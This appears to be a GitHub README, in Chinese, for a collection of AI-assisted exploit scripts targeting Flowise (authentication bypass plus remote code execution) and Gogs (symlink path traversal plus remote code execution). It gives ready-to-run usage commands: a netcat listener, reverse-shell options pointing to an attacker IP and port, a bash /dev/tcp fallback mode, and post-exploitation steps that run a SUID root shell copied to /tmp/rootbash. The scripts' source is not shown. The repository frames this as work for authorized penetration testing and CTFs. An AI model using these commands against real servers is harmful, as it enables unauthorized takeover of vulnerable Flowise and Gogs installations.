0xsyr0/AI-Exploit-Forge-Collection
GitHub: 0xsyr0/AI-Exploit-Forge-Collection
一个聚焦AI辅助的利用脚本集合,解决在授权测试与竞赛中快速生成与验证漏洞利用链的需求。
Stars: 1 | Forks: 0
# AI Exploit Forge 集合
一个在渗透测试、红队行动和 CTF 竞赛期间开发的 AI 辅助利用脚本 curated collection。
## 免责声明
本仓库中的所有利用脚本仅限用于授权的安全测试、渗透测试、CTF 竞赛以及教育目的。请勿在您未拥有或未经明确书面许可测试的系统上使用任何工具。作者不对误用承担任何责任。
## 利用脚本
| CVE | 软件 | 版本 | CVSS | 类型 | 脚本 |
|-----|------|------|------|------|--------|
| CVE-2025-58434 + CVE-2025-59528 | Flowise | <= 3.0.5 | 10.0 严重 | 认证绕过 + 远程代码执行 | `CVE-2025-59528.py` |
| CVE-2024-44625 | Gogs | <= 0.13.0 | 8.8 高 | 路径遍历 + 远程代码执行 | `CVE-2024-44625.py` |
### CVE-2025-58434 + CVE-2025-59528 — Flowise 认证绕过 + 远程代码执行
#### 使用方法
在运行利用脚本之前启动监听器:
```
nc -lvnp
```
```
# 基本用法(节点 shell,默认模式)
python3 CVE-2025-59528.py -u http:// -e -i -p
# 使用虚拟主机头
python3 CVE-2025-59528.py -u http:// -v flowise.example.com -e admin@example.com -i 10.10.14.1 -p 4444
# 设置特定密码而非随机
python3 CVE-2025-59528.py -u http:// -e admin@example.com -pw 'NewPass123!' -i 10.10.14.1 -p 4444
# bash /dev/tcp 回退模式
python3 CVE-2025-59528.py -u http:// -e admin@example.com -i 10.10.14.1 -p 4444 -m bash
# 禁用 TLS 验证
python3 CVE-2025-59528.py -u https:// -e admin@example.com -i 10.10.14.1 -p 4444 -k
```
#### 选项
| 参数 | 描述 |
|------|------|
| `-u`, `--url` | Flowise 基础 URL(必需) |
| `-e`, `--email` | 目标账户邮箱(默认:`user@example.com`) |
| `-pw`, `--password` | 重置后设置的密码(未提供时随机生成) |
| `-v`, `--vhost` | 虚拟主机头覆盖 |
| `-i`, `--lhost` | 反向 shell 的攻击者 IP(必需) |
| `-p`, `--lport` | 反向 shell 的攻击者端口(必需) |
| `-m`, `--mode` | Shell 模式:`node`(默认)或 `bash` |
| `-k`, `--no-verify` | 禁用 TLS 证书验证 |
#### 依赖项
```
pip install requests
```
### CVE-2024-44625 — Gogs 符号链接路径遍历 + 远程代码执行
#### 使用方法
```
python3 CVE-2024-44625.py
# 示例
python3 CVE-2024-44625.py http://127.0.0.1:3001 gogsadmin P@ssword123
```
成功利用后:
```
ls -la /tmp/rootbash
/tmp/rootbash -p
```
#### 注意事项
- 运行利用脚本前必须先生成 API 令牌:Gogs UI → Settings → Applications → Generate Token
- 必须安装 `git` 并确保其在攻击机的 `$PATH` 中可用
- 默认载荷会在 `/tmp/rootbash` 处创建一个 `/bin/bash` 的 SUID 副本 —— 如需修改,请在脚本中调整 `PAYLOAD`
#### 依赖项
```
pip install requests
```
标签:AI安全, AI辅助, Chat Copilot, CVE-2024-44625, CVE-2025-58434, CVE-2025-59528, Flowise, Gogs, RCE, 人工智能安全, 协议分析, 合规性, 字符串匹配, 授权测试, 教育用途, 权限提升, 漏洞利用脚本, 红队操作, 网络安全, 脚本工具, 认证绕过, 路径遍历, 逆向工具, 隐私保护